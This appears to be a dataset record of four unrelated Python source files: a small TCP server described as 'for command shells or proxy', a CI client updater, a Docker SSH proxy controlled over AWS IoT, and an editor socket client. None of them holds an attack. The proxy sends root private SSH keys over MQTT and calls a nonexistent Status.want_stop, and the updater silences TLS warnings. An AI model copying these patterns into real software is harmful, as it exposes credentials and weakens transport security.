tcp_server.py | '''
Made By Sai Harsha Kottapalli
Tested on python3
About : TCP Server
Use : for command shells or proxy
'''
import socket
import argparse
from threading import Thread
def handler(s_client):
resp = s_client.recv(1024).decode("utf-8") #response
print("[*]Received: %s " % resp)
s_client.send(b"hi")
s_client.close()
return
def main():
ip = "0.0.0.0"
port = 9999
server = socket.socket()
server.bind((ip,port))
server.listen(5)
print("[*]Listening on %s:%d" %(ip,port))
while True:
host, addr = server.accept()
print("[*]Connected to %s:%d" % (addr[0],addr[1]))
#threading
t = Thread(target = handler, args = (host,))
t.start()
if __name__ == "__main__":
main() |
ServerUpdater.py |
# Copyright 2016 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals, absolute_import
import sys
import time
import json, requests
import traceback
import logging
try:
from queue import Empty
except ImportError:
from Queue import Empty
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
logger = logging.getLogger("civet_client")
class StopException(Exception):
pass
class ServerUpdater(object):
def __init__(self, server, client_info, message_q, command_q, control_q):
self.message_q = message_q
self.command_q = command_q
self.control_q = control_q
self.messages = []
self.client_info = client_info
self.servers = {}
self.main_server = server
self.update_servers()
self.running = True
# We want to make sure we don't send unicode headers
# Helps prevent the dreaded "Error: [('SSL routines', 'ssl3_write_pending', 'bad write retry')]" errors
self._headers = {b"User-Agent": b"INL-CIVET-Client/1.0 (+https://github.com/idaholab/civet)"}
def update_servers(self):
"""
Initializes the servers
"""
for server in self.client_info["servers"]:
self.servers[server] = {"last_time": time.time(), "msg": "Starting up"}
@staticmethod
def run(updater):
"""
Main loop to update the servers.
This is intended to be called like
Thread(target=ServerUpdater.run, args=(updater,))
where updater is a ServerUpdater instance.
Adding anything to the control queue will cause
an exit.
Input:
updater: A ServerUpdater instance
"""
while updater.running:
updater.read_queue()
updater.send_messages()
updater.ping_servers()
updater.check_control()
# It might be possible that there are more messages, so try one more time
updater.read_queue()
updater.send_messages()
sys.exit(0)
def update_server_message(self, server, msg):
"""
Updates the message we send to the server on pings.
"""
if server not in self.servers:
logger.info("Unknown server: %s" % server)
else:
self.servers[server]["msg"] = msg
def check_control(self):
"""
If the parent process wants us to stop then
they will add something to the control queue
"""
try:
msg = self.control_q.get(block=False)
if isinstance(msg, dict) and "server" in msg:
if "message" in msg:
self.update_server_message(msg["server"], msg["message"])
else:
# Anything else on the queue and we stop
logger.info("ServerUpdater shutting down")
self.running = False
except Empty:
pass
def read_queue(self):
"""
Reads the updates from the message queue.
It stores these in an OrderedDict to be sent to
the server at a later time.
We block on the first iteration but don't on further
iterations so that we can quickly consume the queue.
Returns: None
"""
try:
timeout = self.client_info["server_update_timeout"]
block = True
while True:
item = self.message_q.get(block=block, timeout=timeout)
self.messages.append(item)
# if we have an item we don't want to block on the next iteration
block = False
except Empty:
pass
def send_messages(self):
"""
Just tries to clear the messages that we haven't sent yet.
"""
try:
last_success = 0
for idx, msg in enumerate(self.messages):
sent = self.post_message(msg)
if sent:
last_success = idx+1
self.message_q.task_done()
else:
break
#self.messages = self.messages[last_success:]
self.messages = self.messages[last_success:]
except StopException:
for msg in self.messages[last_success:]:
self.message_q.task_done()
self.messages = []
self.servers[self.main_server]["last_time"] = time.time()
def post_message(self, item):
"""
Sends a list of updates to the server.
Input:
server: the URL of the server
job_id: The job id associated with the update.
job_data: A list of updates to send to the server
Returns:
True if we could talk to the server, False otherwise
"""
reply = self.post_json(item["url"], item["payload"])
if not reply:
# Since all messages here are on the same server, if there is no
# reply then there isn't any point in trying with others
return False
if "status" not in reply:
err_str = "While posting to {}, server gave invalid JSON : {}".format(item["url"], reply)
logger.error(err_str)
elif reply["status"] != "OK":
err_str = "While posting to {}, an error occured on the server: {}".format(item["url"], reply)
logger.error(err_str)
elif reply.get("command") == "cancel":
logger.info("ServerUpdater got cancel command for runner")
self.command_q.put({"server": item["server"], "job_id": item["job_id"], "command": "cancel"})
elif reply.get("command") == "stop":
logger.info("ServerUpdater got stop command for runner")
self.command_q.put({"server": item["server"], "job_id": item["job_id"], "command": "stop"})
raise StopException
return True
def ping_servers(self):
"""
Updates all servers with a status message.
If we have recently contacted the server
then we don't need to contact them again.
"""
for server, data in self.servers.items():
current_time = time.time()
diff = current_time - data["last_time"]
if diff >= self.client_info["server_update_interval"]:
self.ping_server(server, data["msg"])
# the ping could take a bit so use the current time
# We update the time even if the ping failed so
# that we aren't constantly hitting the server
data["last_time"] = time.time()
def ping_server(self, server, msg):
url = "{}/client/ping/{}/".format(server, self.client_info["client_name"])
data = {"message": msg}
return self.post_json(url, data) != None
def data_to_json(self, data):
"""
Convenience function to convert a dict into JSON.
If the conversion fails then we send back a stop dict.
Input:
data[dict]: To be converted to JSON
Returns:
tuple(dict/json, bool): The serialized JSON. The bool indicates whether it was successful
"""
try:
# Get rid of any possible bad characters
for k in data.keys():
# Python 2 and 3 way to see if we are dealing with a byte string.
# If so, decode it to unicode while getting rid of bad characters
if isinstance(data[k], b"".__class__):
data[k] = data[k].decode("utf-8", "replace")
in_json = json.dumps(data, separators=(",", ": "))
# We want to make sure the body is not unicode.
# Prevents the "Error: [('SSL routines', 'ssl3_write_pending', 'bad write retry')]" errors
# See https://github.com/urllib3/urllib3/issues/855
return in_json.encode("utf-8", "replace"), True
except Exception:
logger.warning("Failed to convert to json: \n%s\nData:%s" % (traceback.format_exc(), data))
return {"status": "OK", "command": "stop"}, False
def post_json(self, request_url, data):
"""
Post the supplied dict holding JSON data to the url and return a dict
with the JSON.
Input:
request_url: The URL to post to.
data: dict of data to post.
Returns:
A dict of the JSON reply if successful, otherwise None
"""
# always include the name so the server can keep track
data["client_name"] = self.client_info["client_name"]
logger.info("Posting to '{}'".format(request_url))
try:
in_json, good = self.data_to_json(data)
if not good:
return in_json
response = requests.post(request_url,
in_json,
headers=self._headers,
verify=self.client_info["ssl_verify"],
timeout=self.client_info["request_timeout"])
if response.status_code == 400:
# This means that we shouldn't retry this request
logger.warning("Stopping because we got a 400 response while posting to: %s" % request_url)
return {"status": "OK", "command": "stop"}
if response.status_code == 413:
# We have too much output, so stop
logger.warning("Stopping because we got a 413 reponse (too much data) while posting to: %s" % request_url)
return {"status": "OK", "command": "stop"}
if response.status_code == 500:
# There could be a couple of things wrong.
# 1) We sent some data that the server really doesn't like. This happened
# on mammoth testing where the test output spit out null characters which
# Postgresql didn't like, causing an internal server error.
# 2) The server is having issues (can happen when updating the civet source code and DB).
# It is likely that is relatively temporary.
# Since (1) is a bug in the civet server, we shouldn't abort the job. It is good to know
# though, so log it.
logger.warning("Got a 500 response (internal server error) while posting to: %s" % request_url)
return {"status": "OK"}
response.raise_for_status()
reply = response.json()
return reply
except Exception:
logger.warning("Failed to POST at {}.\nError: {}".format(request_url, traceback.format_exc()))
return None
|
proxy.py | import enum
import functools
import json
import logging
import pathlib
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import zlib
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient
import docker
import msgpack
log = logging.getLogger(__name__)
class Status(enum.Enum):
Starting = enum.auto()
Running = enum.auto()
Stopping = enum.auto()
class Container:
def __init__(self, tmp_dir, docker_client, image):
self._real_tmp_dir = tempfile.TemporaryDirectory(dir=tmp_dir)
self._tmp_dir = pathlib.Path(self._real_tmp_dir.name)
self._pk_file = self._tmp_dir / 'rsa_key'
subprocess.check_call([
'ssh-keygen', '-f', self._pk_file, '-t', 'rsa', '-N', ''
], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
self._bind_root = self._tmp_dir / 'root'
auth_keys_file = self._bind_root / '.ssh' / 'authorized_keys'
auth_keys_file.parent.mkdir(mode=0o700, parents=True)
shutil.copy(self._pk_file.with_suffix('.pub'), auth_keys_file)
self._docker = docker_client
self._image = image
self.docker_port = None
self.server_port = None
self.container = None
self.lock = threading.Condition()
self.status = Status.Starting
def read_private_key(self):
return self._pk_file.read_bytes()
def start(self):
self.docker_port = get_free_port()
self.server_port = get_free_port()
mount = docker.types.Mount('/root', str(self._bind_root), type='bind')
self.container = self._docker.containers.run(
self._image,
auto_remove=True,
detach=True,
mounts=[mount],
ports={'22': self.docker_port, '2222': self.server_port}
)
def wait_for_start(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
try:
sock.connect(('127.0.0.1', self.docker_port))
except ConnectionError:
with self.lock:
if self.status == Status.want_stop:
return
time.sleep(1)
else:
sock.recv(1024)
return
finally:
sock.close()
def want_stop(self):
return self.status == Status.Stopping
def destroy(self):
self.container.stop()
self._real_tmp_dir.cleanup()
def info(self):
return {
'container_id': self.id,
'docker_port': self.docker_port,
'server_port': self.server_port,
}
@property
def id(self):
if self.container is None:
return None
return self.container.id
def in_thread(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
threading.Thread(target=func, args=args, kwargs=kwargs).start()
return wrapper
def json_dumps(payload):
return json.dumps(payload, ensure_ascii=False, separators=(',', ':'))
def get_free_port():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', 0))
_, port = sock.getsockname()
sock.close()
return port
def wait_for_port_opens(port):
while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(('127.0.0.1', port))
except ConnectionError:
time.sleep(1)
else:
sock.recv(1024)
return
finally:
sock.close()
class Proxy:
def __init__(self,
name: str,
host: str,
runtime_dir: str,
image: str,
iot_host: str,
root_ca_path: str,
cert_path: str,
key_path: str,
keep_alive=1200):
"""Docstring will be here..."""
self._host = host
self.name = name
self._iot_client = AWSIoTMQTTClient(name)
self._iot_client.configureEndpoint(iot_host, 8883)
self._iot_client.configureCredentials(root_ca_path, key_path, cert_path)
self._keep_alive = keep_alive
self._stop = threading.Event()
self._handlers = {
'run': self._container_run,
'stop': self._container_stop,
'info': self._container_info,
'list': self._container_list,
'connect': self._send_connect,
}
self._runtime_dir = pathlib.Path(runtime_dir)
self._docker = docker.from_env()
try:
image = self._docker.images.get(image)
except docker.errors.ImageNotFound:
print('Specified image not found')
sys.exit(1)
self._image = image
self._lock = threading.Lock()
self._containers = {}
def _start_iot_client(self):
self._iot_client.connect(self._keep_alive)
self._iot_client.subscribe(
f'ssh/proxy/{self.name}', 1, self._iot_callback
)
def _stop_iot_client(self):
self._iot_client.disconnect()
def run_forever(self):
if not self._runtime_dir.is_dir():
raise RuntimeError(
f'Runtime dir "{self._runtime_dir}" does not exists'
)
self._start_iot_client()
try:
self._stop.wait()
except:
print('Got exception')
else:
print('No exception')
self._stop_iot_client()
def catch_signals(self):
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
def signal_handler(self, _signum, _frame):
self._stop.set()
@in_thread
def _iot_callback(self, _client, _userdata, message):
log.info('Got message: %s', message.payload)
try:
job = json.loads(message.payload)
job_id = uuid.UUID(job.pop('_id'))
command = job.pop('command', '')
except (json.JSONDecodeError, KeyError, ValueError, TypeError):
self._iot_client.publish(
f'ssh/proxy/{self.name}/error',
'Unable to parse message', 0
)
return
handler = self._handlers.get(command)
if handler is None:
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/error',
f'No handler for command "{command}"', 1
)
return
try:
handler(job_id, job)
except:
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/error',
'An error occurred', 1
)
raise
def _container_run(self, job_id, job):
server = job.pop('server', None)
container = Container(self._runtime_dir, self._docker, self._image)
container.start()
log.info('Container %s started', container.container.short_id)
with self._lock:
self._containers[container.id] = container
container.wait_for_start()
send_connect = server is not None
with container.lock:
if container.status == Status.Stopping:
send_connect = False
else:
container.status = Status.Running
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/success',
json_dumps({'type': 'started', 'data': container.info()}), 1
)
if send_connect:
private_key = container.read_private_key()
message = [
job_id.bytes,
1, # Client connect message
[
private_key,
'root',
self._host,
container.docker_port,
2222
]
]
payload = bytearray(zlib.compress(msgpack.dumps(message)))
self._iot_client.publish(f'ssh/server/{server}', payload, 1)
with container.lock:
container.lock.wait_for(container.want_stop)
log.info('Container %s stopping', container.container.short_id)
id_ = container.id
with self._lock:
del self._containers[id_]
container.destroy()
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/success',
json_dumps({'type': 'stopped', 'data': {'container_id': id_}}), 1
)
def _container_stop(self, job_id, job):
container_id = job.pop('container_id')
with self._lock:
container = self._containers.get(container_id)
if container is None:
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/error',
'Container does not exists', 1
)
else:
with container.lock:
container.status = Status.Stopping
container.lock.notify()
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/success',
'Ok', 1
)
def _container_info(self, job_id, job):
container_id = job.pop('container_id')
with self._lock:
container = self._containers.get(container_id)
if container is None:
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/error',
'Container does not exists', 1
)
else:
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/success',
json_dumps({'type': 'info', 'data': container.info()}), 1
)
def _container_list(self, job_id, job):
with self._lock:
data = {
key: container.info()
for key, container in self._containers.items()
}
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/success',
json_dumps({'type': 'list', 'data': data}), 1
)
def _send_connect(self, job_id, job):
container_id = job.pop('container_id')
server = job.pop('server')
with self._lock:
container = self._containers.get(container_id)
if container is None:
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/error',
'Container does not exits', 1
)
else:
private_key = container.read_private_key()
message = [
job_id.bytes,
1, # Client connect message
[
private_key,
'root',
self._host,
container.docker_port,
2222
]
]
payload = bytearray(zlib.compress(msgpack.dumps(message)))
self._iot_client.publish(f'ssh/server/{server}', payload, 1)
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/success',
'Connect sent', 1
)
|
editor_session.py | # EditorSession.py
import socket
import struct
import json
import threading
import queue
class EditorSession(object):
CONNECTION_TIMEOUT = 2
BUFFER_SIZE = 2 ** 14
SEQUENCE_NUMBER_SIZE = 4
CONTENT_LENGTH_SIZE = 4
# Sequence number indicating that this message is not associated with a known sequence number
NULL_SEQUENCE_NUMBER = 0
# Indicates that any-priority packets should be run
PRIORITY_ANY = 'PRIORITY_ANY'
# Indicates that only high-priority queries should be run
PRIORITY_HIGH = 'PRIORITY_HIGH'
def __init__(self):
# Connect to the editor server
self._sock = socket.socket()
self._sock.settimeout(self.CONNECTION_TIMEOUT)
self._socket_data = b''
self._query_handlers = {}
self._response_handlers = {}
self._next_seq_number = 1
self._thread = None
self._continue = True
self._in_messages = queue.Queue()
self._out_messages = queue.Queue()
def _thread_loop(self):
while self._continue:
# Cycle in messages
in_message = self.receive_message()
if in_message is not None:
self._in_messages.put(in_message)
# Cycle out messages
if not self._out_messages.empty():
out_message = self._out_messages.get()
self.send_message(*out_message)
def _get_socket_data(self):
self._socket_data += self._sock.recv(self.BUFFER_SIZE)
def _split_socket_data(self, offset):
while len(self._socket_data) < offset:
self._get_socket_data()
# Split the socket data along the offset
result = self._socket_data[: offset]
self._socket_data = self._socket_data[offset: ]
return result
def _len_socket_data(self):
return len(self._socket_data)
def connect(self, host="localhost", port=1995):
# Try connecting to the server
try:
self._sock.connect((host, port))
except Exception as _:
return False
# Spin up a thread for receiving messages
self._continue = True
self._thread = threading.Thread(target=self._thread_loop)
self._thread.start()
return True
def close(self):
self._continue = False
self._thread.join()
self._sock.close()
def receive_message(self):
try:
# Set it to non-blocking while we check for a packet
self._sock.setblocking(False)
# Probe the socket for data
self._get_socket_data()
if self._len_socket_data() == 0:
return None
# If an error occurred, quit
except socket.error as _:
return None
# Set it to block while loading the packet
self._sock.setblocking(True)
# Get the packet sequence number and content length
(seq_number,) = struct.unpack('I', self._split_socket_data(self.SEQUENCE_NUMBER_SIZE))
# Get the length of the incoming string
(in_len,) = struct.unpack('I', self._split_socket_data(self.CONTENT_LENGTH_SIZE))
# Create a result string
in_str = self._split_socket_data(in_len).decode('utf-8')
in_content = json.loads(in_str)
# Return the packet info
return seq_number, in_content
def send_message(self, seq_number, message):
# Convert the json to a byte string
out_content = json.dumps(message).encode()
# Create the packet header
out_packet = struct.pack('II', seq_number, len(out_content))
# Add the content
out_packet += out_content
# Send it
self._sock.send(out_packet)
def add_query_handler(self, query, handler):
self._query_handlers[query] = handler
def add_response_handler(self, query, handler):
self._response_handlers[query] = handler
def create_query(self, seq_number, priority):
# Create a message for each handler
message = {}
for query, handler in self._query_handlers.items():
handler_message = handler(seq_number, priority)
# If the handler has a message to send
if handler_message is not None:
message[query] = handler_message
return message
def handle_response(self, seq_number, response):
# For each query response in the response
for query, query_response in response.items():
if query in self._response_handlers:
# Run the response handler
self._response_handlers[query](seq_number, query_response)
else:
print("WARNING: Unregistered handler for response: {}".format(query))
def cycle(self, priority):
# Create and send the query
seq_number = self._next_seq_number
query = self.create_query(seq_number, priority)
if len(query) != 0:
self._out_messages.put((seq_number, query))
self._next_seq_number += 1
# Handle the response
if not self._in_messages.empty():
response = self._in_messages.get()
self.handle_response(*response)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.